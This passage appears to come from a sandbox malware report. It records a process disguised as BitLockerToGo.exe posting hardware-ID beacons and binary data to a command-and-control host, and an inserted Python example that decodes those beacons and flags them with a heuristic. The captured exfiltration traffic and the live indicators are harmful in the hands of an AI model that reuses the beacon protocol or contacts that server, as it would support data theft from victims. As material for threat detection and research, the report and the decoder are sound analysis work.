2024-10-31 00:05:25 UTC | 15331 | OUT | Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 45 35 35 30 43 35 38 46 38 30 32 42 31 37 42 42 38 31 38 41 38 33 41 31 41 33 42 44 31 42 35 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 74 4c 59 4d 65 35 2d 2d 33 0d 0a 2d 2d
    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"5E550C58F802B17BB818A83A1A3BD1B5--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"tLYMe5--3--
2024-10-31 00:05:25 UTC | 2828 | OUT | Data Raw: f5 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa 33 f8 52 f0 fd e9 0a 3f 6c af
    Data Ascii: MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X|mn^IUm'3R?l
2024-10-31 00:05:26 UTC | 1013 | IN | HTTP/1.1 200 OK
    Date: Thu, 31 Oct 2024 00:05:26 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=auo0ol4b1h942q8k2fvlmspfnf; expires=Sun, 23-Feb-2025 17:52:05 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bYRqf5jtzG6uFgOAp%2Bj25M8T03u7Nkkm%2FOEmtv5PUtJYevVbAFPgwq0UQZaARtgZixDyP30qSHS0VYDEGhPPeuf5bUu%2FA3eCip41nAADMPkiCEukG4Y8d4rPEaff1CTbLql%2B"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8daf64b57cbb7d57-DFW
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1823&sent=10&recv=22&lost=0&retrans=0&sent_bytes=2837&recv_bytes=19121&delivery_rate=1250431&cwnd=251&unsent_bytes=0&cid=567f16e973b4d760&ts=589&x=0"
2024-10-31 00:05:26 UTC | 23 | IN | Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 0d 0a
    Data Ascii: 11ok 173.254.250.78
2024-10-31 00:05:26 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49740 | 104.21.32.196 | 443 | 2676 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-31 00:05:27 UTC | 281 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8780
    Host: villagedguy.cyou
2024-10-31 00:05:27 UTC | 8780 | OUT | Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 45 35 35 30 43 35 38 46 38 30 32 42 31 37 42 42 38 31 38 41 38 33 41 31 41 33 42 44 31 42 35 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 74 4c 59 4d 65 35 2d 2d 33 0d 0a 2d 2d
    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"5E550C58F802B17BB818A83A1A3BD1B5--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"tLYMe5--3--
2024-10-31 00:05:27 UTC | 1009 | IN | HTTP/1.1 200 OK
    Date: Thu, 31 Oct 2024 00:05:27 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=pmai34repfp50bo3snlqpdtkv1; expires=Sun, 23-Feb-2025 17:52:06 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6sIeBG8uORG8t5%2BYxquB%2Boti4rZSbNsQAIiShaY3euWWd16zUKCPXGRh5GxdLYEypiqhAig2cU1PVt0sh5jLoW%2ButaZpL4ahc5rPkC0MoE3KpdemXMCLcC5NRigCgY8quUfE"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8daf64bdb86ce7cf-DFW
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1427&sent=8&recv=14&lost=0&retrans=0&sent_bytes=2837&recv_bytes=9719&delivery_rate=1978142&cwnd=251&unsent_bytes=0&cid=e454f39c4d69337e&ts=715&x=0"
2024-10-31 00:05:27 UTC | 23 | IN | Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 0d 0a
                                                                                                                                                                        Data Ascii: 11ok 173.254.250.78
                                                                                                                                                                        2024-10-31 00:05:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
5           192.168.2.4  49741        104.21.32.196   443               2676  C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp, direction, bytes transferred, data:

2024-10-31 00:05:28 UTC  OUT  282 bytes
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20433
    Host: villagedguy.cyou
2024-10-31 00:05:28 UTC  OUT  15331 bytes
    Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 45 35 35 30 43 35 38 46 38 30 32 42 31 37 42 42 38 31 38 41 38 33 41 31 41 33 42 44 31 42 35 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 74 4c 59 4d 65 35 2d 2d 33 0d 0a 2d 2d
    Data Ascii:
        --be85de5ipdocierre1
        Content-Disposition: form-data; name="hwid"

        5E550C58F802B17BB818A83A1A3BD1B5
        --be85de5ipdocierre1
        Content-Disposition: form-data; name="pid"

        3
        --be85de5ipdocierre1
        Content-Disposition: form-data; name="lid"

        tLYMe5--3
        --
2024-10-31 00:05:28 UTC  OUT  5102 bytes
    Data Raw: 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00
    Data Ascii: `M?lrQMn 64F6(X&7~`aO
2024-10-31 00:05:30 UTC  IN  1014 bytes
    HTTP/1.1 200 OK
    Date: Thu, 31 Oct 2024 00:05:30 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=r1qu1m2pnumvm6vqfhjp6cdkkg; expires=Sun, 23-Feb-2025 17:52:09 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DUhN22AzAClVyrRVPzXErOPkexlhir5q9tPAdtACBEatWEKqlOjUEvGihjetxb3mlt00xCidIoV68BjFhwk505rN%2BeXOs6vdI35%2FwtJ%2BXOSgRju0bF6nqaxazhf8T%2FzK8Jpw"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8daf64c72ec76b79-DFW
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1074&sent=12&recv=26&lost=0&retrans=0&sent_bytes=2837&recv_bytes=21395&delivery_rate=2656880&cwnd=239&unsent_bytes=0&cid=b101e6337c9b8097&ts=2142&x=0"
2024-10-31 00:05:30 UTC  IN  23 bytes
    Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 0d 0a
    Data Ascii:
        11
        ok 173.254.250.78
2024-10-31 00:05:30 UTC  IN  5 bytes
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii:
        0

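Every beacon in this capture has the same shape: a multipart/form-data POST to /api carrying hwid, pid and lid fields, answered by a chunked body that reads `ok` followed by an IP address. The Python below is an added example, not part of the Joe Sandbox report and not code from the malware. It decodes the session 5 request body and reply from the hex dumps shown in the report, parses the multipart fields while tolerating the fact that the report prints only the leading bytes of the 15331-byte chunk (so the closing boundary is missing), decodes the chunked reply, and flags the hwid/pid/lid triple. The Content-Type value, the hex strings and the field names come from the capture; the function names, the 32-upper-case-hex hwid check and the `looks_like_lumma_beacon` heuristic are assumptions made for illustration, not a published signature.

```python
"""Decode the LummaC beacon captured in session 5 of the report above.

Added example: not part of the Joe Sandbox report nor of the malware. Only
the Content-Type header, the hex dumps and the field names are taken from
the capture; the function names, the hwid shape check and the beacon
heuristic are assumptions made for illustration.
"""
import re

# Copied from the session 5 request headers above.
CONTENT_TYPE = "multipart/form-data; boundary=be85de5ipdocierre1"

# "Data Raw" of the 15331-byte request chunk. The report prints only the
# leading bytes of each chunk, so this body stops before the closing
# boundary; the parser must cope with that.
REQUEST_BODY_HEX = (
    "2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a "
    "43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 "
    "6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a "
    "35 45 35 35 30 43 35 38 46 38 30 32 42 31 37 42 42 38 31 38 41 38 33 41 31 41 33 42 44 31 42 35 0d 0a "
    "2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a "
    "43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 "
    "6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a "
    "2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a "
    "43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 "
    "6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 74 4c 59 4d 65 35 2d 2d 33 0d 0a 2d 2d"
)
# The two inbound chunks of the reply: "11\r\nok ...\r\n" and "0\r\n\r\n".
REPLY_CHUNK_HEX = "31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 0d 0a"
REPLY_END_HEX = "30 0d 0a 0d 0a"

# Assumption: the hwid seen here is 32 upper-case hex digits; treated as the
# expected shape, not as a documented format.
HWID_RE = re.compile(r"^[0-9A-F]{32}$")


def boundary_from_content_type(content_type: str) -> bytes:
    """Pull the multipart boundary out of a Content-Type header value."""
    m = re.search(r'boundary="?([^";]+)"?', content_type)
    if not m:
        raise ValueError("Content-Type carries no multipart boundary")
    return m.group(1).encode()


def parse_multipart(body: bytes, boundary: bytes):
    """Return (fields, truncated) for a multipart/form-data body.

    `truncated` is True when the body does not end with the closing
    delimiter, as is the case for every chunk the report abbreviates.
    Parts that are complete are still returned.
    """
    delim = b"--" + boundary
    truncated = not body.rstrip(b"\r\n").endswith(delim + b"--")
    fields = {}
    for part in body.split(delim)[1:]:
        if part.startswith(b"--"):
            break                      # closing delimiter "--boundary--"
        if part.startswith(b"\r\n"):
            part = part[2:]            # CRLF that follows the delimiter
        head, sep, rest = part.partition(b"\r\n\r\n")
        if not sep:
            break                      # cut off inside the part headers
        m = re.search(rb'[; ]name="([^"]*)"', head)
        if not m:
            continue
        # The value ends at the CRLF that precedes the next delimiter; in a
        # truncated part that CRLF may be absent, so keep what is there.
        end = rest.rfind(b"\r\n")
        fields[m.group(1).decode()] = rest if end == -1 else rest[:end]
    return fields, truncated


def decode_chunked(stream: bytes):
    """Decode a chunked transfer-encoded body; returns (payload, complete)."""
    out = bytearray()
    pos = 0
    while True:
        nl = stream.find(b"\r\n", pos)
        if nl < 0:
            return bytes(out), False       # size line missing: stream cut short
        size_field = stream[pos:nl].split(b";")[0].strip()
        if not size_field:
            return bytes(out), False       # malformed size line
        size = int(size_field, 16)
        if size == 0:
            return bytes(out), True        # last-chunk marker
        data = stream[nl + 2:nl + 2 + size]
        out += data
        if len(data) < size:
            return bytes(out), False       # chunk body cut short
        pos = nl + 2 + size + 2            # skip the data and its trailing CRLF


def looks_like_lumma_beacon(fields) -> bool:
    """Heuristic (assumption): the hwid/pid/lid triple seen in every POST /api
    above, with hwid shaped like HWID_RE and pid a decimal number."""
    hwid = fields.get("hwid", b"").decode("ascii", "replace")
    return (HWID_RE.match(hwid) is not None
            and fields.get("pid", b"").isdigit()
            and "lid" in fields)


def analyse_session5() -> dict:
    """Decode the session 5 request body and reply shown in the report."""
    boundary = boundary_from_content_type(CONTENT_TYPE)
    fields, truncated = parse_multipart(bytes.fromhex(REQUEST_BODY_HEX), boundary)
    reply, complete = decode_chunked(bytes.fromhex(REPLY_CHUNK_HEX + " " + REPLY_END_HEX))
    return {
        "fields": {k: v.decode("ascii", "replace") for k, v in fields.items()},
        "request_truncated": truncated,
        "beacon": looks_like_lumma_beacon(fields),
        "reply": reply.decode("ascii", "replace"),
        "reply_complete": complete,
    }


if __name__ == "__main__":
    for key, value in analyse_session5().items():
        print(f"{key}: {value}")
```

Running it recovers hwid 5E550C58F802B17BB818A83A1A3BD1B5, pid 3 and lid tLYMe5--3 from the abbreviated body, reports the request as truncated, and decodes the reply to `ok 173.254.250.78`. The same hwid and lid appear in sessions 6 to 8 with pid 1, so the hwid is the value to pivot on when hunting for other beacons from the same host; only pid changes between the POSTs.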

Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
6           192.168.2.4  49742        104.21.32.196   443               2676  C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp, direction, bytes transferred, data:

2024-10-31 00:05:31 UTC  OUT  281 bytes
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 3802
    Host: villagedguy.cyou
2024-10-31 00:05:31 UTC  OUT  3802 bytes
    Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 45 35 35 30 43 35 38 46 38 30 32 42 31 37 42 42 38 31 38 41 38 33 41 31 41 33 42 44 31 42 35 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 74 4c 59 4d 65 35 2d 2d 33 0d 0a 2d 2d
    Data Ascii:
        --be85de5ipdocierre1
        Content-Disposition: form-data; name="hwid"

        5E550C58F802B17BB818A83A1A3BD1B5
        --be85de5ipdocierre1
        Content-Disposition: form-data; name="pid"

        1
        --be85de5ipdocierre1
        Content-Disposition: form-data; name="lid"

        tLYMe5--3
        --
2024-10-31 00:05:32 UTC  IN  1010 bytes
    HTTP/1.1 200 OK
    Date: Thu, 31 Oct 2024 00:05:32 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=rct5djjme2ri6ta2g9bq8daomm; expires=Sun, 23-Feb-2025 17:52:11 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BwKxEHzs8oF1q6FlDADcC92k%2BW7kPQeRX5Pv%2B%2F70CrmVJjKxxSHAMHe%2FzLFgILVxnlUAjRtpIZy3ElJs0N1Sv8TCQ6wg7HhiaNsYMwAfaR2hXH3SJ8XWsq9XsuwEFryN2oNj"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8daf64da6c4c2ff0-DFW
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1944&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2837&recv_bytes=4719&delivery_rate=1427304&cwnd=239&unsent_bytes=0&cid=07b59ef199ee70f3&ts=480&x=0"
2024-10-31 00:05:32 UTC  IN  23 bytes
    Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 0d 0a
    Data Ascii:
        11
        ok 173.254.250.78
2024-10-31 00:05:32 UTC  IN  5 bytes
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii:
        0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
7           192.168.2.4  49743        104.21.32.196   443               2676  C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp, direction, bytes transferred, data:

2024-10-31 00:05:33 UTC  OUT  281 bytes
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 3818
    Host: villagedguy.cyou
2024-10-31 00:05:33 UTC  OUT  3818 bytes
    Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 45 35 35 30 43 35 38 46 38 30 32 42 31 37 42 42 38 31 38 41 38 33 41 31 41 33 42 44 31 42 35 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 74 4c 59 4d 65 35 2d 2d 33 0d 0a 2d 2d
    Data Ascii:
        --be85de5ipdocierre1
        Content-Disposition: form-data; name="hwid"

        5E550C58F802B17BB818A83A1A3BD1B5
        --be85de5ipdocierre1
        Content-Disposition: form-data; name="pid"

        1
        --be85de5ipdocierre1
        Content-Disposition: form-data; name="lid"

        tLYMe5--3
        --
2024-10-31 00:05:33 UTC  IN  1008 bytes
    HTTP/1.1 200 OK
    Date: Thu, 31 Oct 2024 00:05:33 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=p9anensbm23h0oe95a596m64de; expires=Sun, 23-Feb-2025 17:52:12 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KpFVmowqbp49kzMs%2BGe9FBVExu%2FW8JnJmbzrbasIsWuz5wcak1uN3xSxsVdaoQ2iyyAN9RnwjSduCLTBYuEVkJRVBVBRP%2FHAZS8lnHAjpkck8hbiiFEdW8EY7WYq5nKk3HOq"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8daf64e34c0028d1-DFW
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1113&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2837&recv_bytes=4735&delivery_rate=2558303&cwnd=251&unsent_bytes=0&cid=d5c2178b049e17df&ts=485&x=0"
2024-10-31 00:05:33 UTC  IN  23 bytes
    Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 0d 0a
    Data Ascii:
        11
        ok 173.254.250.78
2024-10-31 00:05:33 UTC  IN  5 bytes
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii:
        0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
8           192.168.2.4  49744        104.21.32.196   443               2676  C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp, direction, bytes transferred, data:

2024-10-31 00:05:34 UTC  OUT  281 bytes
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 1249
    Host: villagedguy.cyou
2024-10-31 00:05:34 UTC  OUT  1249 bytes
    Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 45 35 35 30 43 35 38 46 38 30 32 42 31 37 42 42 38 31 38 41 38 33 41 31 41 33 42 44 31 42 35 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 74 4c 59 4d 65 35 2d 2d 33 0d 0a 2d 2d
    Data Ascii:
        --be85de5ipdocierre1
        Content-Disposition: form-data; name="hwid"

        5E550C58F802B17BB818A83A1A3BD1B5
        --be85de5ipdocierre1
        Content-Disposition: form-data; name="pid"

        1
        --be85de5ipdocierre1
        Content-Disposition: form-data; name="lid"

        tLYMe5--3
        --
2024-10-31 00:05:34 UTC  IN  1003 bytes
    HTTP/1.1 200 OK
    Date: Thu, 31 Oct 2024 00:05:34 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=bcq53aqcleu2sdkdr4p0fnf8nn; expires=Sun, 23-Feb-2025 17:52:13 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
